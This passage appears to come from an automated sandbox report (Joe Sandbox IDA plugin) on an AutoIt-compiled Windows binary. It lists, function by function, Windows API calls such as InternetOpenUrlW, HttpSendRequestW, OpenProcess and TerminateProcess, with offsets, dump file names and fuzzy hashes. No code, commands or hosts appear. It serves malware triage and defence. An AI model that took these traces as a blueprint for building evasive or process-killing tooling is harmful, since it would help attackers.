                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual
                                                                    • String ID:
                                                                    • API String ID: 4278518827-0
                                                                    • Opcode ID: ef5e38f8294645aefff51316107adff7ee263bb50e3d98407b44493b92ea11c1
                                                                    • Instruction ID: 9d2863c7842b2ffdd4a12c4b087c20dec97d51d9a8b70a8514c0030e70835d4e
                                                                    • Opcode Fuzzy Hash: ef5e38f8294645aefff51316107adff7ee263bb50e3d98407b44493b92ea11c1
                                                                    • Instruction Fuzzy Hash: 110148B090175A7DE3009F6A8C85A52FEA8FF19354F00411BA15847941C7B5A864CBE5
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 010353F9
                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0103540F
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0103541E
                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0103542D
                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 01035437
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0103543E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 839392675-0
                                                                    • Opcode ID: 6e7461cfb14f4b1a153350a1eadc2ecbc987d99258159fd3d3ef4a4646d1327a
                                                                    • Instruction ID: db8b0933b08d89c66498dfdb7d84217b0a15f458c271565aafc3ca110830b373
                                                                    • Opcode Fuzzy Hash: 6e7461cfb14f4b1a153350a1eadc2ecbc987d99258159fd3d3ef4a4646d1327a
                                                                    • Instruction Fuzzy Hash: 4BF01D32241259BBE7315AA29C0DEAB7B7CEBCAB15F000159FA44D20519AAA1A0187B5
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 01037243
                                                                    • EnterCriticalSection.KERNEL32(?,?,00FE0EE4,?,?), ref: 01037254
                                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00FE0EE4,?,?), ref: 01037261
                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00FE0EE4,?,?), ref: 0103726E
                                                                      • Part of subcall function 01036C35: CloseHandle.KERNEL32(00000000,?,0103727B,?,00FE0EE4,?,?), ref: 01036C3F
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 01037281
                                                                    • LeaveCriticalSection.KERNEL32(?,?,00FE0EE4,?,?), ref: 01037288
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 3495660284-0
                                                                    • Opcode ID: 5d61cac1c30909017ac1af881d620aa05a33713d9ad35bd076a0d6b2c7dc1b31
                                                                    • Instruction ID: 63e230f0997f42f2ad39bf5b4a9028c6664fa8b00912a2c434c25fae54a07049
                                                                    • Opcode Fuzzy Hash: 5d61cac1c30909017ac1af881d620aa05a33713d9ad35bd076a0d6b2c7dc1b31
                                                                    • Instruction Fuzzy Hash: D3F0BEBA441303EBEB622B24EC4C9EB3B29EF45342B100121F28390098CB7F1400CB50
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0102899D
                                                                    • UnloadUserProfile.USERENV(?,?), ref: 010289A9
                                                                    • CloseHandle.KERNEL32(?), ref: 010289B2
                                                                    • CloseHandle.KERNEL32(?), ref: 010289BA
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 010289C3
                                                                    • HeapFree.KERNEL32(00000000), ref: 010289CA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                    • String ID:
                                                                    • API String ID: 146765662-0
                                                                    • Opcode ID: 5db9dd7650ca3f730a794d2d9a3c548d5fab427116b71ac7eefa5dffdfbe9140
                                                                    • Instruction ID: 98544c014540e945cd451b851dfb580cc5fa18790a32b4aab01968378965ebd5
                                                                    • Opcode Fuzzy Hash: 5db9dd7650ca3f730a794d2d9a3c548d5fab427116b71ac7eefa5dffdfbe9140
                                                                    • Instruction Fuzzy Hash: 9BE0E536004206BBDB112FE1EC0C90BBF79FF8A322B108220F259C1468CB3FA420DB54
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 01048613
                                                                    • CharUpperBuffW.USER32(?,?), ref: 01048722
                                                                    • VariantClear.OLEAUT32(?), ref: 0104889A
                                                                      • Part of subcall function 01037562: VariantInit.OLEAUT32(00000000), ref: 010375A2
                                                                      • Part of subcall function 01037562: VariantCopy.OLEAUT32(00000000,?), ref: 010375AB
                                                                      • Part of subcall function 01037562: VariantClear.OLEAUT32(00000000), ref: 010375B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                    • API String ID: 4237274167-1221869570
                                                                    • Opcode ID: 41299138b71dd654b45952ede9d34d8a72e3327c498e60a93380a6fde79d9fa9
                                                                    • Instruction ID: c125cafec0ccabeed0a317757ed134fb1511c8cfc14c7ef80dca032c000b06f5
                                                                    • Opcode Fuzzy Hash: 41299138b71dd654b45952ede9d34d8a72e3327c498e60a93380a6fde79d9fa9
                                                                    • Instruction Fuzzy Hash: D4919EB16083019FC750EF68C48495ABBE5FF89714F088D6EF98A8B361DB35E905CB52
                                                                    APIs
                                                                      • Part of subcall function 00FEFC86: _wcscpy.LIBCMT ref: 00FEFCA9
                                                                    • _memset.LIBCMT ref: 01032B87
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01032BB6
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01032C69
                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 01032C97
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                    • String ID: 0
                                                                    • API String ID: 4152858687-4108050209
                                                                    • Opcode ID: 202d2cf5b37fb609efe5abd3674a75d97c40e2563799791b9105c04be77708c5
                                                                    • Instruction ID: 027c374588869be0143d9bd327b324d55a893b29247eabb86c70f1c79d002e90
                                                                    • Opcode Fuzzy Hash: 202d2cf5b37fb609efe5abd3674a75d97c40e2563799791b9105c04be77708c5
                                                                    • Instruction Fuzzy Hash: 5E5100715183099BE765DE68C844A6BBBECEFC5310F040A6EFAC4D72A1DB74C904D752
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0102D5D4
                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0102D60A
                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0102D61B
                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0102D69D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                    • String ID: DllGetClassObject
                                                                    • API String ID: 753597075-1075368562
                                                                    • Opcode ID: f08c9ee280b379143f08e044ff774c709464a9350c53b59c8bb2e16e433d6773
                                                                    • Instruction ID: 18006bafaa023195fc6a82ac04e39d8277290fb627bf0ba36f6167f4dd9afa52
                                                                    • Opcode Fuzzy Hash: f08c9ee280b379143f08e044ff774c709464a9350c53b59c8bb2e16e433d6773
                                                                    • Instruction Fuzzy Hash: 2441C3B1600215EFDB25DF94C888A9A7BBAEF48310F1180ADED49DF205D7B5DD44CBA0
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 010327C0
                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 010327DC
                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 01032822
                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01095890,00000000), ref: 0103286B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                    • String ID: 0
                                                                    • API String ID: 1173514356-4108050209
                                                                    • Opcode ID: 2a7ad69602d81f97dd281d76ce29cff4e31fdfe81021f547f49ad276bcfa809e
                                                                    • Instruction ID: dc2d34d20a1ea4a6e56515f7f2d89621abfd5971d0bcc1f4c99e1bfd65f6004b
                                                                    • Opcode Fuzzy Hash: 2a7ad69602d81f97dd281d76ce29cff4e31fdfe81021f547f49ad276bcfa809e
                                                                    • Instruction Fuzzy Hash: 0341B0702053029FD720DF28C844B6ABBE9EFC5314F14496EFAE697291D734E905CB52
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0104D7C5
                                                                      • Part of subcall function 00FD784B: _memmove.LIBCMT ref: 00FD7899
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharLower_memmove
                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                    • API String ID: 3425801089-567219261
                                                                    • Opcode ID: 5405f0eea5df81b194e58c892de67b71c9267eaf48a29d12207048735b2b2be6
                                                                    • Instruction ID: 7b3a2d67ad2c287cdb5b3eec034e32faf4d96e21aa1f7a3be183adff3b769f30
                                                                    • Opcode Fuzzy Hash: 5405f0eea5df81b194e58c892de67b71c9267eaf48a29d12207048735b2b2be6
                                                                    • Instruction Fuzzy Hash: 8131C5705046199BDF00EF98CC919FEB3B5FF14320B10866AE8A9977D2DB35E905CB80
                                                                    APIs
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                      • Part of subcall function 0102AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0102AABC
                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 01028F14
                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 01028F27
                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 01028F57
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$_memmove$ClassName
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 365058703-1403004172
                                                                    • Opcode ID: 93d101ae54bf3b4009d8ffa933873f9f3dd3e8756cc550d57879241d9efa8f5e
                                                                    • Instruction ID: 3c00d37b282267b6ebce801be18b80aaf3de30b9d562d90f8acf993e07d9e452
                                                                    • Opcode Fuzzy Hash: 93d101ae54bf3b4009d8ffa933873f9f3dd3e8756cc550d57879241d9efa8f5e
                                                                    • Instruction Fuzzy Hash: 5F21F875A04205BEDB54ABB4CC45CFFB7AADF45360F04851BF591572E1DB3D48099620
                                                                    APIs
                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0104184C
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01041872
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 010418A2
                                                                    • InternetCloseHandle.WININET(00000000), ref: 010418E9
                                                                      • Part of subcall function 01042483: GetLastError.KERNEL32(?,?,01041817,00000000,00000000,00000001), ref: 01042498
                                                                      • Part of subcall function 01042483: SetEvent.KERNEL32(?,?,01041817,00000000,00000000,00000001), ref: 010424AD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                    • String ID:
                                                                    • API String ID: 3113390036-3916222277
                                                                    • Opcode ID: 434dfe2a9b7bd064b7320b60f0ea0d54a83a3856585ce817b34492ea4d0c73a0
                                                                    • Instruction ID: 921475e60e517da7455000d619c7eeb3cb73d5642d7f8e8de2d3810cd2fed77b
                                                                    • Opcode Fuzzy Hash: 434dfe2a9b7bd064b7320b60f0ea0d54a83a3856585ce817b34492ea4d0c73a0
                                                                    • Instruction Fuzzy Hash: 9A217FB1600309BFFB119A64DCC4EBF7BEDEB88644F00413EF585D6140EA79AD4597A1
                                                                    APIs
                                                                      • Part of subcall function 00FD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FD1D73
                                                                      • Part of subcall function 00FD1D35: GetStockObject.GDI32(00000011), ref: 00FD1D87
                                                                      • Part of subcall function 00FD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FD1D91
                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01056461
                                                                    • LoadLibraryW.KERNEL32(?), ref: 01056468
                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0105647D
                                                                    • DestroyWindow.USER32(?), ref: 01056485
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                    • String ID: SysAnimate32
                                                                    • API String ID: 4146253029-1011021900
                                                                    • Opcode ID: 825494e17fec1fbc25ac633d7dc6bb1b654b510b1af64a11e96ef04740effa25
                                                                    • Instruction ID: fd6915a31538fa90696e208d727eff65f3909f0961e5890a6ec05947c8965485
                                                                    • Opcode Fuzzy Hash: 825494e17fec1fbc25ac633d7dc6bb1b654b510b1af64a11e96ef04740effa25
                                                                    • Instruction Fuzzy Hash: 5C21C271100205BFEF914E68DC50EBB7BEEEB48364F904629FE9093192CB36DC419B20
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 01036DBC
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01036DEF
                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 01036E01
                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 01036E3B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandle$FilePipe
                                                                    • String ID: nul
                                                                    • API String ID: 4209266947-2873401336
                                                                    • Opcode ID: df339a17bb8f71bec549bfd39ee474a507310f1d99f76634d7aaf5b179a1ef6c
                                                                    • Instruction ID: a8cb35c91872d954cfba26f67b66ed3a060a6ce774e6fa823421562e3dec7dd0
                                                                    • Opcode Fuzzy Hash: df339a17bb8f71bec549bfd39ee474a507310f1d99f76634d7aaf5b179a1ef6c
                                                                    • Instruction Fuzzy Hash: E221657590030ABBDB20AF29D808A9A7BFCEF85720F104A59FDE1D72D0DB729654CB54
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 01036E89
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01036EBB
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 01036ECC
                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 01036F06
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandle$FilePipe
                                                                    • String ID: nul
                                                                    • API String ID: 4209266947-2873401336
                                                                    • Opcode ID: 7c1e3c123b2b6046db3ef45f0d331f53cfd57ffa5afbcd3ddf565e9a7cb40468
                                                                    • Instruction ID: 869a1d8eb8d9c463f622f5a8c9f33326163f5fcae8c6f293cda8e9916bb2816d
                                                                    • Opcode Fuzzy Hash: 7c1e3c123b2b6046db3ef45f0d331f53cfd57ffa5afbcd3ddf565e9a7cb40468
                                                                    • Instruction Fuzzy Hash: 63219071500306ABEB209F6DC804AAA77ECEF85720F200A59F9E0D72C0DB76A6548B60
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0103AC54
                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0103ACA8
                                                                    • __swprintf.LIBCMT ref: 0103ACC1
                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0105F910), ref: 0103ACFF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                    • String ID: %lu
                                                                    • API String ID: 3164766367-685833217
                                                                    • Opcode ID: f1937eababa80b27a14b1119e3e12e35e32b1617eadc393bf49b4d5a5db8b23c
                                                                    • Instruction ID: 96e44bcc0048dbc71ebf313e44e3955b3d38733e1f118b045f52056d96eec76f
                                                                    • Opcode Fuzzy Hash: f1937eababa80b27a14b1119e3e12e35e32b1617eadc393bf49b4d5a5db8b23c
                                                                    • Instruction Fuzzy Hash: 52216031A0020AAFCB10EF69C944DEF7BB8EF89714B044069F949DB351DA75EA41DB61
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 01031B19
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
